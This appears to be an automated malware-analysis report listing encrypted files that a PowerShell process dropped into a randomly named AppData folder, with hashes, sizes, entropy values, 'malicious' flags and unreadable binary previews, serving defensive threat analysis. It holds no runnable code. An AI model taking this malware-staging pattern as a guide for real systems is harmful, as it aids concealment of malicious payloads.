SHA-512:	2B2C4FB240BA3DCCB9D3F6AEF54131198B67C5C0661EA015931933A80C5D00CC90087C38EF80926D821EBC7E26EF58E28B63D6D79542227BC62F57A72AB90860
Malicious:	true
Reputation:	unknown
Preview:	.~i.....@1..............+.&.u]..J=...X"..98._A..&.D.>..,.....[....\..>.H...J..6....jX.AC.Ae....6.......)..\[/.V$...;.]p.U.G..+..k.7.X>@;v..WR....S... .Q...]/\|.3e.#d...dw._.....5..{;.3.n.f....8.!.ld...>.nN.e+h'W.....^.1...........?.....V:.`a.)...\|...3.O..)h.KVFA..-[+.a.].m{...,..f..G...4.......Y..uQ`H....Zn.{c......~..Pq..Q..R.G.<.Oj..6c.\lR...$.;,..I...y"..=....'K[ .....G...bG........N{.t.u.U..1c.._x).}......<.9.3..4d.......2f......^..=\1..tZve}.K.Y..Z.-...i:....P.Ae....:.fJm...;..M.D.z.k.GB...H.....8Q.....e.5........C......x..U..l($......p..;.8...(..M...!..'.Y.X........E..j\|RpxA,.....+..+&....,. ...'......"..\|m.9cP...Yb...?.P.P..ITX.9.y..; .9..T.6g."3'...........`....^\}a..]E.MUB.' 0/....2}%..+.Io......_..b.Qp...g..0!...+.X.t.O..R.\|.cI...7V....#..Io>......Q.7...@.....zR`Fp..J...,...y...Q5..cCa........{K%M%y%... n..r.8).A..N...:z.l6o..[T.}+....6@1J........n...B?..;.y...k..`H.P.Px....oW..W...}M._........SM..C*...VEA"...^..........]...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\PZOcyHMJvil.HvmBqxPieNlFf Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	132054
Entropy (8bit):	7.998455417654244
Encrypted:	true
SSDEEP:	1536:JjNVTWH+lMpzehkxpt36iSF/YU2O6I+lsQIw6Q8Ue/YUdv+GyVbJF9gNMRffBrEu:FTK+wpjIIsQt6Q8nyVbJIWfBl
MD5:	11CDC274F633827744AFCE09440E4B45
SHA1:	26331433BE66C04754C3BC5F694A8C2088DC1DF5
SHA-256:	DDB0DC918984990B3572B2182C34B1551237054DC073445F332B70580ADC00D2
SHA-512:	948519176573DA9104987DBD81C8733701AE27D0EC7144FE98A7E63CFF5AC711A3D84503A4DD6A14E5F0C4FCA9FF24AC7267F3267317F161975B0D88EB44C2B2
Malicious:	true
Reputation:	unknown
Preview:	..(...~....!..M,G.9mA..jn.A..k.g0.&!O..V...k.r.y.f.E.&.<..n.9QVe..&.r..A..X`..s.9.i..f.......H.5..m..A.R....Df......z$.,...Z.......rw...,e$b.....`....Z2S..7;....q.=.......).A...D.7B..w.<.W.L..Q%.....b.....Dh._.NQ.g.....W...U3.......M.x...n..~.j.=..u....T...de.LyEp=.r..(hX4....W....I;#./q.. .......9..o.h....G.pnR....5.WC}.YGO#........6,.i.j:^..].T....}.A 1. ;:;.].p..{...R......4U....\.....p/....X.o.H....G......U..C\|..Y..V.b.u.A@.c.....1.5..l(...+...7DU..W....V.W.....)K..$...X..i,9.+sG...j..>.s......B.R?..o+..)VYv.p..h.J#.hf..{.1TA\|>.S.....y.q...!.....u.:.......7....g{s.{..I3.J..Y..X.........._.z.B....#.........+.)9Q.No..i.q5.n.uj..wW..&...7'$l.._.P.l.w...1.N..{.....r.+.;Tt.Ds.M...$.3..7...U....q.4..z%.0A.eY..Q1t.V....PY.6xw........!.........\..")U.....w..?W...9(S.W..S.~...u...Y.E...DI/.z.Q..h.&....E.y.....G....G.{#....X.}.s.*ug.....AvE..-..(..'..h].Al.WU.1....4tK....'a....L.T....%.?.!'..{9.Q..j@c.......^]..]..$......-.q.1T........J.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\PzbMTQRnspNCmD.bHWvqgoDsASPuZdT Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	151186
Entropy (8bit):	7.998710993008102
Encrypted:	true
SSDEEP:	3072:GS5YvwBpnLaqYOzF9zXO4aWGnkHhG0T31x2rE1seckrWchYg1p4oj:d/PLaq3VXO4a1naJ/+ecxKYgMoj
MD5:	24C01A5D58C3DDDBC6898B74E030FC1D
SHA1:	8CA4B2C53F7B8343ACFDD57CF8F6202A7E4DCCEB
SHA-256:	DD0516A76C159D4F623B85DEABD9424CB4750AA2B653322F628CD3190BA3D345
SHA-512:	B9481E0FD96C45DA835EF7C8ED80C51BFCB17F6AE9B1232895BD0C16403EBF27FCE92634E0B5ED30C3B437E97C37B776416B8F84CB8B7AFEBBF1125978FB96F0
Malicious:	true
Reputation:	unknown
Preview:	........\|..=..`...uO);z...X$.V....Jz...%....B0rv&I2{..x/_.\.W..$.......HO.M.^.A.....[o..Ja.G.[B..U...m#R.,._...X...>b.......@..f>...@....d..y..v.m0..u....u.g.T.j...h3.B3...E......K'....E..Q.....0J:Du...PjuZ^x<.E.A....../l0..6...Cbd8.\|T.'..N]..Q.s..s&.ERz.3rF...V..E.i.{.....;..1.<..9.)..7.1.dC...]....5...M6...(...{...2.J.n...)B.....(.Z.....s.;).=.H......9B.6.c....5hw....1..{2....A.....W ..p...........X..0.. \{i...... .6.>._..M.sk....m.&.8..w1%......t.V.......V.........~...N.C.-..uv!!..?~T(...p359...R.vw..S.y..Q.f....d.kD.VD..V...(H.q....0_..Jg.W.gx.bx.^ 2......7. .$.{R.?....wwmh...c...w..3.ZA.^..&B...l...UE..WA..#.7......p.u~!.G%.....!.j.C.M.:.W....\|.....#....1\|O.uz..#o-.P.C2........+J...2......5...Y.........I.zbm..@.S...4.X ..#...^+.!~...!.r..~.Em..X...P\.:.].%......2...j.Z.J..hf/.l.fXk.\|.f3.l..owc..@Nv....t`....KI.^v.s.J(7N.Jjz..nz.C.u.I..q.. ......N2.NUs. .e...,.....).k.....2.b...G..#m..$z..DOus.P..%?....:..T..*h...I......6.=~....+

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\QPERshlVgOv.pdqlngwktfIDyHj Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	122316
Entropy (8bit):	7.998414978923311
Encrypted:	true
SSDEEP:	3072:dTpIlfMsVz7DI6a8CV8O6uz5p3vlQGzh0FmKnYAh:zIlfMut26uzPvlFziYKYAh
MD5:	3342949BF7504FD3046C684EA9027D30
SHA1:	3BBFEC1E1760C6F3D2825F84C110366EC05F50F8
SHA-256:	622B6546498330313F0477A5915C75FED0A80C488BEC91366CABE87B1734B37C
SHA-512:	E7DC57C7B6F92C64EDD916DCDD686DF7AB4FCE3C73D557C6CCDA6EC5ECDBA4AD7B7CB6F9FF40BA8C427185FA531DC9A58A4F56CA5BEE1DF74FB9BF4AE0D44626
Malicious:	true
Reputation:	unknown
Preview:	.9...J\|..#..y.Pp....T..B}M.o/5..w...O28...W\|.........(.....xc.G...0h=...yh.......S........e..=.i4..8..ag>\|...@p2..W..B.9t. ..<.%N..B..{S...^c.$..w..P..].......rB".R..\.>..j......h....k.....}..!v.F.~.5cq.G......Y4^.....B.[..D...y..)M.H..#b....#....._.<{..w...T.../..N}..$... .`d..q......a`.Z~.C....<a(.-...9g..4^..V.B.z..Gc..O.L0,.Q(V~...#.F:.m.......n..7TN_(.7Y..6F_..l.w..k.@.m._@zN........Y......k.F....vA...o...%\|v..e.-./..t.....P4....&\...j....H$...a.~.E..y.u...........Z3b.D.....l..."........4e.....a...=KS.I:..oy+.."b.....R.>.-K.....l.P....OTm.E{.. ....^../..$..v..\..m...u.`.&..E.Z=dQ!..nP..4.I..=.S.dS.7J...]Z...ZtfQ...c.Mv%...(.....s....}.q....H2.Z6KF.._.%".A.2.q.Zv.kBw..F6..(._...DLaT.$Z..;.?.v..@...\`Ws.1.5L.d],..".G..L.I...9X..n......`.]MTXi.gI,..a8/....\|....z.%..E..A}U...R......".5...5.c..p.C-..V.m..%.c-aNH. W..(.m....{.6........R.....D..O..T. .....g.....s.\|...,.F..$.....G.6.V%../..+<....>.b..E..R}..axI..E..}L.....O..-...NN..r.l..c

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\QViZhqFrkYxUbwtjs.AfnrkbFHlJIQmjg Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	164732
Entropy (8bit):	7.998941224010397
Encrypted:	true
SSDEEP:	3072:hF/UD9QZTETJ7BERBDz0ilq8MtVRjaIGLFFMC+ZUaPgZMmMLM7/3/:PUD9Q5EJMa8+jaIGLFFgZU4gZM4/3/
MD5:	272F3DA977BA253542E91A121F7366B0
SHA1:	9B6AEE1FAAC120F71097A6999EB64D57A126954F
SHA-256:	AD026A7045645BD219740F82C61D9868E2F2B3AA2AECB0E3562F2FD891D4C1B7
SHA-512:	F4D3A9E6B7D2F1E8973D01F38BF59B42A71833B2327B1E9FDA8EDED9197FE3742EBB0D155F903C7C740F83DACCBC46CD8CBF240C98E4ADB7815438DFB4EC34B8
Malicious:	true
Reputation:	unknown
Preview:	....%.n#.z...km.4.)...a...b;3~.....mx.........2.......k..T.n..GX..>..9..J.3..T...._!oH..W..$]qF..lf.....V2.$...U....:%.]T`Q.v...3..../D..<.w?..m..._.....]8O,....k.#g.[.~Y... ......1m.>........ .......uPG%.r.<..#..b....O..M$t.L......%uir).z.lD...... [&.Y...... .....{..#...q.vwr.~.nk...tD.yhK..t...ku.7R;..>.nx......h...N}Z#6r.~uz..l7....yi.-.......?....\t.....Gf....H1xPn<.....#..-}!.Sr....5....K..`..i......u..k..f..CS.!91~.._....f...?.Q...+....K...V,HP....L..C......V.g...naz..../9.HC..{v......u..+.T..m6..&..y....67.ar....{b...S/...Z.u...".V....%.n........q.......e.....I..*Y.^..\|..O.............A.>......../.}....O....J...58...I........\.....~./.W,y..;..5.Z-O.4...9.G;.h....h..`F..8.6\..y_....-$x.YR.....d.g.A.....$...=.7e"`..;.>2..&.L.iu.x...\|.t...Q.Z_....Y........I......"....)..O'z..:..R.9x.$.'..M............64i.>...]...Y....l0....s].-;.:..(A..wh".L...]...$........ #5%...1.z.. .X.^..........4.&..zI.)z..E.r.....6.FH...F."..{.X

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\QeURHgVGfO.wWGyBLsIXg Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	98976
Entropy (8bit):	7.997803496465686
Encrypted:	true
SSDEEP:	3072:I0+uXjt4tSnnM8XbKgppQ94jo7NVRl59mM:I0+kB4tKMC5ppQmc7NV35t
MD5:	AEB4B9D885C5B7010F8740BE018170E8
SHA1:	C443F25F8D92059FC98AE5FDC60664605F0741F5
SHA-256:	8A8CD714C4E70BDDD93A3670D8BF69E47D1B65252D1EC8DA1940C62AB8AE6CD5
SHA-512:	5A10613524CCF6EF9B05D09A00E5F7E0E757F4B59CF0F708AF492660C6EA0FB8E90094D073FA2B04966F5E21C479B9511BADB33EDDBA9CEA6457ED60FAA87884
Malicious:	true
Reputation:	unknown
Preview:	...V.......#&.gNw...~D...^.S...G..oP.."..G.........j...L.DG.G.X...q..n.d~....H....5.........9iG..JC...k.'...A-0....)"...q_..@.E(..4.....j.....f.].2#...Jcy7:E.c..._k...........l....V!O\|G.:...R.-7J<.....#._..n..AC..G...$.Xj.$..c.....#....p.Jh.....U.....sT..7....;.C.O.o...............'SDxN.8..x...U.J.?...+.t.y.O.u..... ..)',...4.~. ...)'\..."&)+..8"\|._.....d.o@....7X...V.>...X.%......K5S)..ZI.&^....E}..........JDm..mH...{.......d%,..3$.7.i~..J..6,....6..."....3...c...SX!L.x.c..\|.m......4..J<D..w.e..d..L."R.52u.1&~\..........8.O.. ...R.X..,I..Wy..v.p..........8..(....>..e..I.T@....c6...{].)c...P..l.2H.mv.[.....R..i...\..$0;,.R..m<..V....Qq.].@.0.!^....n#.1J......;.Xc.(a0.]..@...O...S...m..Q.G\|p.S.p.W6^....\R5.g.r..H..p....[..].....oN...G..b"m.....gog...N]@.Bae?...Gn....(..-..5....;l....=X...U"...%P]cW?.yao..wL..H'....p.."6..M.....*.,E.N..M..b.qV......T...o.\[....d...V..^....`+.%..q.....q.3......K(.JZk......0.~h.....wm0k.......`..GL.#....mv.Z.\h....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\RYeicyKBsxuqzCbTlmF.NbdeOVtjPKHlWphknca Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	178009
Entropy (8bit):	7.999068622953857
Encrypted:	true
SSDEEP:	3072:ARU5tpe5M7Cl7Mr2IHHLTgnq/2hQxh3a1VxIBDTc+KcabjUKkwjABEgRQDL4c+mO:ARU5PaM2dMrWnpexhKbxmDEcm2wjgEgt
MD5:	5A6D8FEE164C913B94311D601755E1A5
SHA1:	155C877C8A4EFC804939DAD264A0AC847C7A09DE
SHA-256:	C304B9403154D0B05C69C335594D715CC5EDE08914BE6BF786B1A0D014712CD7
SHA-512:	472562FCB1B05F78433A759C3D8AFC995CC19F2E506CDD7B24408C51AD1EA26B97FE002FC2B99BDFBBA0AFB1CD8E452C45CA86C0644CD602E52DBD797201E262
Malicious:	true
Reputation:	unknown
Preview:	.p@n.s...J...N..\.s...B....E.....m..u..7......J.....C\|.q^,..0..Be].M.....3...<..M$L......I.N_.X.I40.I..I.Q!3.V.8..;.I....A...G....!..P.x.'.......p.J....b.2..-m.1...s..5..8...o.U.mZ./.#.....i.kT.z.X..yJ:......G../..p...Q.......uY.X@...g-...e.QD;}..k.0......]..A..k;.6.}..su..o..G;l..'.Tq.aG.P?I........./}.)...%.c.R....U8.6.b3,.....l....+.a."...Z..".aXW.3.....=9.BQ\........X.....y/R.Jc..-.....#W....]..y....k...w..e-..a].......4:.V.....[...&=m........o.su.W1nH......`.]..`....v...2.L.a.3.,.5.E.2.)...K..6....D.!..X33.-.0W:+.J...Mw...H...,..pq?.....sW.'..x./......#.oV..Ha......V..C.f..d...Db.;...N.).....P.....=)!.............'7.W.x...h..R{.$..{..:.._.;...O..V.)..QH...N9.y.~.ei........=......[..F2x.Is..&O...G>.+{.\|..C.6..}4#:."......fR....1...0$..'........,... ((sv.s)..U....G...W..W..N#.;.lz..z.@~.2xi....D.9.Rle...&...c..../+.9.*.......yu...........a.OOvV.....(..y.?Ck.X.x..o.g.S...'.......u.vJ8..>..&..'.@.......sD.!...x..M6y

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\RmIThqQrYvx.uYGfRlPCeH Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	166637
Entropy (8bit):	7.999180986611223
Encrypted:	true
SSDEEP:	3072:WhuRgKO5cF3zc1Yc8JLLDVGhEQfCGwZzYTbaQ2jBhXUDdyjUGVzP3F:Wh2F3Iuc8BD8AG+QOljBJOygGVzP3F
MD5:	0A38874DD1FD43DE270C997F64365BAF
SHA1:	6C2D367A3889D106DB6CC3570488EBEAD5FFFE9E
SHA-256:	E54D9662E70F1A06159BA17FDC9CF0EECC0707CCA9132686A7E07E6FD9E3530D
SHA-512:	ACB6B3BCF05B3641B048DC25B9329E4419070BC43E7B1F9DE99DEE7879857C4203C1B1E8B8EC5FB7F771983D6B7BC60E905861AB4A217DEB877E996BBD1744FB
Malicious:	true
Reputation:	unknown
Preview:	.;..75...ocU.deL....S..I.W....'.....k..-.:.45......(....k..Y.9U<o!P.q$u+.%.w..o\..I....T,....u.........[.....V#...N.#.B82E$.z...>P[.(R0.60.:B..^0..B...r.`.hh.CP.m....m...W...y.I).I..=.>X..o......`.H$...yu......H....=..z......,....%....xU~...^..D.Y...!...a..G.5........4%..p8Q00k......T)Eg.h6.x...2_.+....:$Hx0..N/.j.^...`p....j./..:z..=./..6A..]c..E..B.I..0-....u....rvJ`.....\..o..<p7o.R.r...5.q..W.,.n.({.....t.9.~...\.^.>.qc.dA(.`....<3.n+[..8/y....".....oR....k.o.f.(:...3...2B....%m.a-.}....F.........S)...zu.s..I4.Y...i=..\..b...[....t.J..*o v...J..KS..,N.n....t,..XRc.f.[-;'.y.T..S.SL".%..+W........w..q^.&..3...k...,_.;..~)%...c{^.............W...`la.........K....(O@...-..C....#..F.k.4.....H..9.Gz.e.47Km!.%.q'..).D..../Z,.+..HW..)..4.rW.(.^.....c.OMI...r...Q).....4t.9f[[..2>....Lp..2..\|Z..b.....\|....b..4W..3DG.].3.^[..B.?m>O....h.c..~R(U%I...F:.n... ..i#s..E.J'.RV.-..5...B.!&...i.YG...[.zp.J.{A..@..\|.?.l..L.(..:.4...Z...w.e.2..bv..,.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\RpTbSfhcWgVE.ksIJLSKcpOGA Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	145941
Entropy (8bit):	7.998597237823096
Encrypted:	true
SSDEEP:	3072:TDKw+2xICefoGbggn+fS2veJF+CbaoaiMFEuaqhtxFcOWjWlNo:XKw+2xgnEBeJvRBStxOjqlNo
MD5:	8BE1AA6BFF1B6FE18FBF1FCA635ABEF7
SHA1:	661CF93C5FD5829CA9C08A5A4F385283CE47E344
SHA-256:	C12CC2DC689A18563B68A1B3CFF2504F412A1B1EDA33BE610A9025E41454EB51
SHA-512:	C2BAE9AE5589E0A79FD3AE77900AC735C846F0572D4ACE8A2D81AA7AF48474428D08267CBA6C254F81DAF46C6381F56E91036EC68E2822F5D49D3379910B8A36
Malicious:	true
Reputation:	unknown
Preview:	...T..l..r.8..k.Fq.... i...swa .C.A.`.Z.i.R..;X....9g.a.u..G..$L(.0.%8.VU..p.;....v...CS...P.....(.........e.u..9..u.PD..eD7..j...)C..'d....../W.].k..O...:.C........5@'0....W..'[...J2$......O..i..f.Z^.'.......6tC...k..l..ON.......O..9..@;.......~6..k.H.J..2,..%AX.8....l.{... ....,.....]s.{Z.z.,.EM.......1.X....{@.S._..9eF.....X..1..S$S...F.Ws..:..B.9?.+.+.1..,8{.d.....qm4..T........T(c'J.qg.+;S.3L..0....tv.k...C.....p.....c@.yW.$./...u..v......!".6.....`9U.5..j.Z.R.J..%.-.`.7..... ..7g.e......:.Px}.....{_.l...}.).J2MG.........%..(...%......j%.\|..\|.0....&X\|..G...g.[.Hf.nSN7..\v..5\|.....B.r...c..~!9..G.>.......C7.....m.m..Jf....f.5E(.yBw.4.Q.\|G.h..:".T..rb.].....`..b.+\|.8....j.I.QD..H..Z..S.....>{=......E.x}.~..3......c..........tB.......}....4@fL.z?Bv6.v.o..i........h...e5...7=...]x..../.f./z.<..y6..L\d.3A]...+...:/L..8.~...c:r.......SK.....(_..S{,!..=.l.H..kj!$+48.&...}.............x#.n.....e....-.2Y.*4.b?..6.r.>.'.v~@.0..m.@.`U..+

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\SRzDIgufWpxvsG.QpoBgwbCXilRhSkvtV Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	173471
Entropy (8bit):	7.999067492687387
Encrypted:	true
SSDEEP:	3072:8+401a1L3rBNPSfsFW6iHsiJ9OZbRHcgYlsvOnW859sniR2pHE:VTq7rBN6yslJm+JWtnLk
MD5:	4BD8331C9281C0BEFEEA4EF9033105A5
SHA1:	10731FC586FCA486C925E285CB1ECD96893C7FD5
SHA-256:	5E3A44C03E406088A58F69C684A2461D8038EDAF288CC2CF1A6193A1D4B14A53
SHA-512:	C0659B68E23A78C3244F0AA4962C9309026BFEBE32BDA778750A55C4410D348C0C32FBA769EE3ED3745CF5C8D668CB8CEFF7703F31845DED04DC561587D8E3FA
Malicious:	true
Reputation:	unknown
Preview:	ZWJ.+9..........a.m#.H/.$'...u..M_....Z..[..].............:,.K..e.$;!....s7_.2q....S.:...'.Hu`E.5Y......M\|..3..@..E.+.Dr..oG5-r)B.T....\.......W.G<.C`VIc.M..F.e..-K.)o..vm.<d......69.E.D..W.w.\|..\...X...N...o..0..W..MKvn....5....k)...12R.8.w...F.t$...z.i.....s..VT...P&........X.e%..<]....=BT.....5.$.QGqg.r..M.MR...<qT?.\|@.M"..=.z.....G.0.H...wK_x.\.....k..n....%M..$...#Y..9!...sc......-C...4.*.mS.f3`.u..IB..Et..0.'6..Lb....b..7D.....8.!6.}.JJ_....E.3....d....=.w.t..b.T..jC....:.&.]....ZOT.e....-Z6........k.%.s.............7..m.X........5P.)p\....bOc>N.;.....l..o..n.x.0.T:...?Bc..1.....^k.W......3.:M.......#uP@-.`...).!.....&C2..F(......;.5.w.6b.q.,..G./..D..7....l..........s.m.......I7..r..Y.-.e.E.H=W.!'..n.....$......`...i...'.~..yxY'.F...(..Lr...}.8.....y...Z...%~u......19..E.~..8...[.Q..y$X&.4.[3?..+D-...3.$.X...["g{!.t(.I...J.FddW..-.....r.H..G8........H...<.B$...:...t.>.<.[v~.....FX(%6...........[O..\|75Z[Ue.X.&..L.qO..........+G

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ScIKulPoBVtjnfDxQTF.OcoEDWhSkHTpq Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	151277
Entropy (8bit):	7.9987631561175645
Encrypted:	true
SSDEEP:	3072:rgfNhuUD/mj2fXeiZi1ex8VNyoEBTLmHh4V1puQWWyWO/ahrDBxZ:rgfjuTKVZuexcN9mNHIahrDvZ
MD5:	1CDB42832B81326B4B208DFB766B5175
SHA1:	7956B46EB93FA183411373B3C96EA327A1AC3CF8
SHA-256:	2B3CA19DE711B67075BD2E1382C551B2FA8E01983DBCF7A9FAFF87ACA3DB80A5
SHA-512:	011223732B7972B7D7EAD2D4EBD7A8A9727C0B5355453D302057018F6D180A551A6A95EF269C730CAB445E2DDC82FB7A349971C8D1D94CECB5049E929E5A0698
Malicious:	true
Reputation:	unknown
Preview:	.^].7..Nyi.c.T...R)=%...X....i,.].%%..)..)'.h_....f.....s..}.o....)...[.)l..l.....#..j)..Z..)....'q.5.......]...u.L..R...y.r.\|\|.jEI..O20oS..u....D67..).+..g.."..m^.nI"%..-..y)'\|..HFD.v.+.+..UW0.r...!....~..nv.u..Y...C..s...y..!....&4.8....:...V..}..F.+......L.T)W...Q7\..88.-.#...L=...S...IpW.n..>R+u....e...........+.w..h..O.h...yp....1~....Y.p.4&-...+....`:./..!...`..!...m,..xuKrQ I....W.o..Upf9Zy.H.y.,.`.....:...,.....ie....\..~..\..P......n.e-}.....@I..o..d.Zd#{...&.....N...~mj....o...5.Q.q.@B..0..H..7M..x./..'..9...m.v.^E.:..=.=..j..8..i...Y=Ik...,.]..V...q.w...=.g....d....@....."A....E.....f.W..$..@.Y{...{.......M......:f......?..>..e[s.}.)b...5TDJ.N..{M9...........1......`.........G.q."w......Q.3l....7+..;^..[...%N.........7..MwiIl-.........Yr.~.........,vl.1......PL>{.'.J.Cfb;J..iq...*`...,$FC0-........{2.....d./sz[Qb.q...j.64.....S.g.[r.@.G.}...h.\|mj.jD.2.v<@...8. ..Y........5z..5iJ#..{W.....Q4Dx.Mu]uV.4.....#s.b..8?..{.,..4T=..d....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\SqtfjTWkhVyEKDNMa.EQFTNWbKwiMyzRBZm Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	136809
Entropy (8bit):	7.998705033111386
Encrypted:	true
SSDEEP:	3072:uSyOrFp8xCt/SLMh9erERjYv/f7KiAb4NRofHjy7PqVzFS7TijMe2UNDWJ:ryOcxToh9wERjYv7KirnUy7SVB9v2UN2
MD5:	98B8F608E30136294BE9D959C5A5FE8F
SHA1:	D0DE502BDFD45A99B87C7F3FDD89CF7645B1EF75
SHA-256:	4AF83B9D11D677CF09FAE7B0C34C3C325F0EF668565F9B6D509079050C35202C
SHA-512:	A5A70D1DBA0E72CD32DEB87706D95FC4B35BD2F9B05791EB945956C819F9411127ED450F138553E742A5108D383AFF71D8E9A348C38F09104E71431FBC3A37A1
Malicious:	true
Reputation:	unknown
Preview:	`..."\|.2.!0.Qt......meQ..I.o........0.....(..@.D.V..c..U3?.7.WoeaoF.7H.{.ST4.....UR[ E-.hj.....k.4....:..R.......}K...A.....n.U...~....E.5.}..:....O...]>\.I......+..k.t..%...}..y'.S.[\|...{~...[.U!...~..8'gV)Z.wP.w..i.(.%.x.r1.,...K.3..H#UW{u)e.b<o....J..+..X*p..,.uk..E..........[..s.Kd~..]`.P.i......O.,........`. vn.....^..]A.h..R;.$..E....`D..W.c8.......^si..L..\|$...O.6t0?..K...U0y.e.I3...M.\.%..L.....x.~.c.kc2..X.........oiE...xF.../.A..f.!@6..w..VZ...f.....X....)........f.9.V.-.!........@Y.km...fiz[....H.v.\|j..(P%...K....T6.P.p...qD...3v.i...#.E?....yJ;...\|..c..5w.,E.R.c..0.........sr.p...J....a.rK7LY..A.y.........-.&$X.....B.%r~...@..1..`......R.wp.%..P..(e7e.Fu.~^\j..8..U..QLz.....n...DC..m.1...M.. .s..O.IM}..FE#D....l&.....#Khz......E.4....,0'..vjUS.....c..y....!LF..i.../........$..p....9.....N..o.....R..A.x.ud(..2U.B...}.....x........z.9.Uj.7-.)....,..x u:..7@...D..X..-._S.....'[#.uD..e.@......d.k>....#{.[8.O....x.]..f.k.%{.>O.{.2..RD>Q.7)-....t

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\TFrOzKbfuNn.VEiftFwzYZa Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	65691
Entropy (8bit):	7.997306574235526
Encrypted:	true
SSDEEP:	1536:dVC/RjI5XChaMVzC9lcMlkxRTHi2XdXdhbR/rNtTgpbjEO:dVA5m92HHd3/WIO
MD5:	01E9F2A8B6308312C513B128BDC1C36E
SHA1:	15E5CC8D8C08D46418F4B041D523CDAECC4F0137
SHA-256:	1CFCEF7B638B731AD72D3D0E4E925782F54CC090AC0793A0E8C76412728B3670
SHA-512:	6AD2258E3817A730E070FFCB6E69FC7347030EFACC3C8A421CF1F889507B234B376F247E0D8144622F45C774ABE8458B29118C01CE932CC0375D875536365352
Malicious:	true
Reputation:	unknown
Preview:	...Hl..G;.;.....Z.KS.k./k.&V75%...V..m....(..6Gb.+..j'.Wt.z.....0.i....U...9....3......t..~..V....b?@h....:R.....k......[........./.....^..9>,..#.;7..G.3..>.].Xz..].1...]....x..~...8,.L..:H.{w:..4..../.\|..?.".Yd...B...nJ\.=.H..ZC.Pf..{..2H]!..q..4.i...hIoZ.>^,k.....0.....)D-..pz..."....F...0.8.h.A...N`..?.B....N..e;?.3$Z....s.#b..L.....'b..F%.."4.,.M..J.....,...t.x...oZ.....Q.~5..R.rA.5p...'.nm...........y!..G.Ez(6.........j...{2.$.u...2.......)._.x.........&..$.2.}...........CA.k..$.c....n...-.....L,..0K>.W.Cn .86.c..']nW...........~.pw.)B.4.2v....DW$.v.p.5......j...^;m.TC".}...#.M....c..Mu...Y.j.@h....?z2pu...:..M.k.B...d%..A.....!D.s.....Fw..lV..&.....Uy.4....,.Ix...Oh.C.......J...(..\KU..%*K....>O...a._M8m$H. ...z......bB\|..-....P.....gS....a^..?.+B...D.,}F......-2.`..d;._%..Z.PLz~0).B.vy H..`$.....r............(y._....a......b..j.u.2].e.3lMH7..v`...m..F....M.y...)...."Q....V.6z.sP...;@w..2".Qhz..tK\.J..2M........Q...../..;LC..:.M...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\UNPQltKgCkcfTzBdj.LHkDuBCGWAQdqKje Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	73965
Entropy (8bit):	7.997343811550718
Encrypted:	true
SSDEEP:	1536:xYMlA1Hl6Wluse/Wl0AK0eqYj09Ru9pTgVdZmGrm9iW1T2C:xnlA1H46e+0RxqYjkRMTgVdZL6T1TJ
MD5:	1E364F246AC30C30B98F9EE8CD3CA117
SHA1:	6CC3AB1557C962A5B88C579DD58C120CBC3F2F9D
SHA-256:	0AC7D6756B99B5930C090C0E5BD11A4516BEA13B9B202A9CD5099F010F20820A
SHA-512:	1BB55BE4188B70B6CFC71A9F765F292D031D76F58E6115390F1DD522C9154FF86ECBE00FDDD11A98040FC785E3F11CDECE4133CFE6DD3EF218B64071E7FD33C8
Malicious:	true
Reputation:	unknown
